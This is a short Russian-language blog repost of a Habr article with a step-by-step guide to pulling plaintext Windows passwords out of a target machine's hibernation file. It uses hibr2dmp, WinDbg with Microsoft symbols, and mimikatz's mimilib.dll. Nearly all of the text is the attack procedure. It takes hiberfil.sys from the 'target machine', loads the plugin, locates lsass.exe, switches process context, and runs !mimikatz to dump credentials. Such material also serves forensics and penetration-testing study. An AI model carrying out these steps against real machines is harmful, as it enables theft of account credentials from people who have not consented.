Данная статья была взята мной с habrahabr и показалась мне очень интересной, и по-этому я спешу поделиться с ней вами. Как известно, утилита mimikatz, позволяющая извлекать учётные данные Windows из LSA в открытом виде, существует с 2012 года, однако помимо хорошо освещённого функционала восстановления паролей из памяти работающей ОС у неё есть ещё одна довольно интересная возможность. Далее приведу пошаговую инструкцию, как при помощи нехитрых действий извлечь учётные данные из файла hiberfil.sys.
Подготовка
Для осуществления задуманного нам понадобятся следующие утилиты:
- Debugging Tools for Windows;
- Windows Memory toolkit free edition;
- И, собственно, сам mimikatz.
Действия
1. Получаем файл hiberfil.sys с целевой машины.
2. Конвертируем файл в формат понятный WinDbg.
hibr2dmp.exe d:\temp\hiberfil.sys c:\temp\hiberfil.dmp
Процесс может занять довольно продолжительное время
3. Запускаем WinDbg и открываем полученный файл.
File -> Open Crash Dump
4. Настраиваем отладочные символы.
Открываем File -> Symbol File Path… и вписываем следующую строчку:
SRV*c:\symbols*http://msdl.microsoft.com/download/symbols
Вместо c:\symbols, естественно, может быть любой каталог, в который будут загружены символы
В командной строке дебаггера пишем:
0: kd> .reload /n
Ждём окончания загрузки символов:
5. Указываем путь к библиотеке mimilib.dll (находится в каталоге с mimikatz).
0: kd> .load z:\Soft\Security\Passwords\Mimikatz\x64\mimilib.dll
6. Находим адрес процесса lsass.exe.
0: kd> !process 0 0 lsass.exe
В данном случае адрес: fffffa800a7d9060.
7. Переключаем контекст процесса.
0: kd> .process /r /p fffffa800a7d9060
8. Запускаем mimikatz и получаем пароли в открытом виде.
0:kd> !mimikatz
Оригинал статьи: http://habrahabr.ru/post/250999/
